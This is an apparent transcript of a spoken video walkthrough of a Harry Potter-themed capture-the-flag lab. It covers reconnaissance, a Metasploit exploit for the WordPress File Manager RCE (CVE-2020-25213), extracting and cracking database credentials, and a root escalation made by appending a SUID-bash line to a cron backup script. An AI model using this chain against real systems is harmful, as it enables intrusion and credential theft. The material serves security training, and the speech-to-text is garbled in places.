Hello guys, welcome back to a Pen Testers Club. Today we're going to discuss about penetration testing on WordPress website of hidden data. So WordPress we can see like hidden of the content also you cannot go for a penetration testing that one. So we would like to look that type of securities WordPress website to penetrate today. So what are the penetration testing methodologies we used here? So the penetration testing methodologies we used here: Net Discover, Nmap, then uh, GoBuster. Then we would like to use the WordPress cracking, and as well as we go for privilege escalations. So now we start the tutorial. So just open the terminal. So you just type your IP address. So my IP address is 192.168.46. So it's okay. So just type sudo su, then enter the password. So now you need to find the network discovery. So you just type net discover minus I and it's 0. So here I got my machine. So I just quit now. 192.168.1.47. So I just type nmap minus a 192.168.1.47. So now let's wait for the result. So here result I got it. So I just open the Firefox now. So here I got the SH as well as the AT. So 8 is Apache HTTP, so it's 22 is SH. So we need to go for cracking now. So just open this. So I just clear my previous history of labs. So just type 192.168.1.47. So here you can see this like similar like an Harry Potter. So we just find now a robots.txt. Here nothing yet found. So it's okay, no worries. So now I just come back. You just type directory bus uh, GoBuster with using a same thing. So I would like to go with my right IP address is 47. So it's give a blog on JavaScript. So I just go now to a blog. So it's showing directly, it's like a WP admin March 31 2021. It's just like a WP admin, like it's a WordPress website. Okay, so I would like to quit this. Same as it is, you just come back here. I just use a block. So here we got the WP content and WP includes on WP admin. So you just go for WP content, copy, come back, paste it. No, it leads to an error. So it's like a forbidden. It's okay, no problem. WP includes. Includes. No, it's also a wrong. WP admin. So, but we are not getting that WP admin. So we need to get further more. So I just type now quit here. So I just type open new tab and I just type WP scan using the same thing. So I already have a token, so I just want to change my IP address. So WP scan URL, and I would like to use my IP address and forward slash with the blog. So, but I'm not getting. So I want to look the plugin detections. So the plugin detections is like aggressive scan and API token. I just use my API token of WP scan. So I just enter. So this will scan now. So before that, I just type MSF console. So let it be scan until we get the result. So the WP scan is like 6.32 is the final version. Okay, it's no have any updated one in this. So you can see enumerating all the plugins via aggressive method. So it's okay. So let it enumerate. So before enumerating, so we just start the metasploit. So metasploit is scale. So now we would like to get like search WordPress scanner. So here we got it. So I just type use 0 and I type show options. So here in the show options, so I just need to set up only the set r hostess 192.168.1.47 set target URI is block, then set, then you just type a run. So now it's running. Even you can see here progress is WordPress file manager version is 6.0, but here also we got it, there also we got it, the same thing. So it's just like similar, but here we got it directly. So it's okay. So we got it. WordPress version is blog WP JSON and WP version 2 of users. It's okay, fine. So the WordPress file manager version is less than 6.9 is a vulnerable to authenticated and arbitrary file upload, resulting in a full compressive of the system. So we need to go and get the such the again an exploit with an arbitrary file like such CVE 2020 25213. So you can see here exploit WordPress file manager remote code execution. So I just type use 0. Here I got it a use 0. So we just type show options. Here you got the show options. So you need to type set lhost 192.168.1.46 and set rhostess 192.168.1.47 and you just type set target URI is block and you just type run. So it's getting the meterpreter shell. So let's wait. So it successfully get the meterpreter shell. So we just type sysinfo system info, we got it. Now you just type shell. We got it, the shell. So now you just type export term equal to x term. So you just type python 3 minus c import pty pty spawn. Yes, spawn slash bin bash. So it's directly given you everything. So directly came to a arrowgag as a username. So you just type cd home, then you can type list minus lha. So you just need to go for cd guinea list minus lha. It's an empty directory, so you just come back cd. Now just type cd hagrid 98 list minus lha. So you just type cat harcrux 1.txt. So here we got something else information. So you just need to decode this one. So just copy this one. So you just type echo and paste it. Just type base 64 minus d. So it's decoded. Sorry. So I just made a mistake. So I just type echo. So I just give in double quotations. So paste this one, base 64 minus d. So here reveals a diary destroyed by Harry in Chamber of Secrets www.argoghome.hagrid. So we just type list minus lha. So we got it, that clearance now here. So we need to find the WordPress where they hosted and everything. So for that, so you just type cd opt, sorry, cd opt. So you just type list minus lha. No, we not yet get. Cd back. So you just type list minus lha. You just type cd home list minus lha cd hagrid 98 list minus lha. So now you just type cd etc list minus lha. So in the etc we got the WordPress. Okay, so you just type cd WordPress. You can type list minus lha. So here you got the config default.php. So you just type copy. Now just type cat, paste it. So here we got it, the WordPress informations like PHPs and everything. So you just copy this one. Just open the notepad. mousepad. So just paste it here. You just look here, everything okay. So just type cd home Hagrid 98. So now you need to set up this these things. So here you can see in these things. So this is not an important now. So I just close this. So username is root and password is things. So I just type MySQL, username is root, and I just give a password. So it's asking a password. So I just come back here. So the password is my secret password. Copy and paste it in the clipboard. So we have successfully pasted. So we just type, we need to go to a WordPress. So he is using a MySQL database to update his WordPress. So you just go to use WordPress. Then you need to type what we need to get from here, WordPress. So I would like to go show tables. So I got the tables. So you need to enumerate from the tables. So here is any users. Okay. So we just type select star from WP users. Sorry, I just written wrong. Select star from WP users. So here I got the WP users. So you look it out, the WP users is like Hagrid 98 and password. So you just copy these two things, Hagrid and password. So just copy these two things, open a this your Word file. So you just paste it the both. So you just need to copy this one until this, just copy and come back, file, open new tab. You just type mousepad pass. So you just paste it the password whatever I just copied. So you just save and I just close this. So now you just type cat pass. So here I got the pass. So now you just need to type John pass word list equal to user share word list rockq.txt. So something is missing. So I just type here clear. So cat pass. So here that is clear. So you just type cd user word list type list rockq.txt. Okay. So I just type clear cd John pass word list user share word list. So no password hashes is left to crack. So just type nano pass. So just type control. So just type nano pass. So just type oh yes quit. So John pass word list user share word list raw.q.txt. Okay, so if it's not coming, so we no need to worry. So just copy this one, copy. So come back. So you just open new tab. So you just type crack station. So you just paste this one. Class 1, 2, 3, 4. Crack a hash. So it's an unrecognized something we have done in here or somewhere else. So you just type only from here, copy. So remove pass, type clear list, mousepad ps, paste, come back, cat ps. Okay, now you just type John ps word list user share word list raw.q.txt. No, it's not going to be happen. Otherwise we just type John ps show. So here we directly got it. So while we go for cracking with raw.q.txt or crack stations, so the password is password 123. So you just type sh. Now you just come back here. So agreed 98 at the rate 192.168.1.47. Then hit enter. So you just give permission yes. So you just enter password 123. So we are in the password 123. So you just type list minus lha. So we came in the list minus lha. So here also we can see here cat hardcase.txt, copy and paste it. Yeah, so if you want to decode, you just type echo copy, paste it, base 64 minus d decode. So you can see Riddles, a diary destroyed by Harris in Chambers secrets. So you just type cd opt type list minus lha. So here only have backup.sh. So you just type cat dot backup.sh. Here we got the backup.sh like temp copy to a user share WordPress content uploads temporary WordPress uploads. So now you just go to cd temp, so type list minus lha. So we need to get the pspy Python script. Okay, so you just type here pspy github. So you just need to go and get. So this can monitor the Linux. So you just type here release releases download version 1.2.1. So here have something releases. Yes, so now you just go downloads, download version 1.2.1. So you just go for release. So I just come back here. So I just type wget one pspy download. So now let's see. whether it will download or not. Yeah, it's downloaded. So you just type list here have, so you just give a permission chmod plus x pspy64. So now I just type pspy64. Otherwise we just give list minus lh. Otherwise we give chmod plus s pspy64 list minus lh. Yeah, so now I just give pspy64. So now I just type pspy64 execute. Otherwise I just want to use grep backup. So now let's see, only it will present the backup. So we are only targeting the backup one. So now let's wait for the backup one. So it's have like bin bash minus c bash opt at backup.sh. So we got these two things. So I just quit here. So I just type cd uh, opt. Now we just type list minus lha. So you just type nano dot backup dot sh. So you just need to add here something. So you just need to type copy bin bash temp bash chmod plus s temp bash. So now I just type Control O and Control X. So now I would like to look again cat dot backup.sh. So here I successfully added chmod plus x temp // dash bash. So I just go to cd temp again. So I just run again pspy grep a backup. So now let's wait. So until we get the result, we would like to go further. Still we not yet get. So let's wait for this. So it's taking a long process. Yeah, but we got it 1 2 3 4. So but we got it a 4. So I just type quit now. So I just quit now. You just type list minus LHA. So here I got it successfully as a bash. You see. So this will directly enumerate to a root directory. So now I just type /bash. So I got it in the bash. So I just type ID. I got the ID. So now you can see here ID is Hagrid 98. Okay. So now I just type. So I just type temp /bash -p. So I successfully executed here. So I just type cd root. I just type list minus LHA. So here I got it harcux2.txt. So you just copy this harcux2.txt copy. So you just type cat and paste it. Harcus2.txt. So congratulations, the mission author Mansur time author. So you have successfully PWN the Argos missions also. So you need to decode the message here in the WordPress. Okay. So this is the uh, word. So I just copy this one. So I just type echo u for colon and just type paste it and just type base 64 minus d decode. So Marvelo Gaunt is ring destroyed by dumbled or bash file. So we have successfully get that characters of the WordPress what they used in through an MySQLs and everything. So we would like to go in detail. So from the beginning. So you just come back here. So first we do the net discovery, then we go for nmap. Then nmap we go with the directory busters. In the directory busters we got only the blog. In the blog also we never get the WordPress of high security level websites. And later we got the go through a Metasploit. So we go with the WordPress scanner. So WordPress scanner it shows less than 6 WordPress file manager version is less than 6.0. So that is a vulnerable. Even high is also vulnerable. So again we go with CVN exploit like remote code execution of the WordPress. So we set up our proxies and everything. So once we set up and we execute it, so it's directly given the meter sessions. Then we go with the shell and we just exploited through any escalations and privilege escalations. We extracted the what is the base of their first harcross.txt one. Then later we go for uh, escalations of the root. Then we have successfully uh, uh, dump the user ID and password. So we have successfully get the SSH password and here. So you can see here the SSH password is we tried many things, but we never had work out with the rockyou.txt. But John, we just use get very simple way. So now we go for privilege escalations. Then we just set up the bash of GTF4 bins. So we have successfully executed this work. So try it your own guys. Thank you guys for watching. Have a great